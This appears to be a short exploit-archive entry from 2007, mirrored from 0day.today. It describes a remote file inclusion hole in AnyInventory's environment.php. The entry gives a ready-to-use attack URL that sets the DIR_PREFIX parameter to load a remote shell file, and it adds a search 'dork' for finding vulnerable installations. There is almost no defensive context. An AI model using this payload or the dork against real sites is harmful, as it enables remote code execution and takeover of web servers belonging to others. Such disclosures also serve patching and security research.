id: 2110
date: 09/04/2007
title: AnyInventory <= 2.0 (environment.php) Remote File Inclusion Vuln
author: ThE TiGeR
cves: 

================================================================
AnyInventory <= 2.0 (environment.php) Remote File Inclusion Vuln
================================================================


#AnyInventory => 2.0 Remote file inclusion

#Download script : http://physics.ramapo.edu/downloads/anyInventory-1.9.1.tar.gz

#Exploit :

#http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?

#Dork : anyInventory, the most flexible and powerful web-based inventory system

#Discovered by ThE TiGeR




#  0day.today [2023-03-22]  #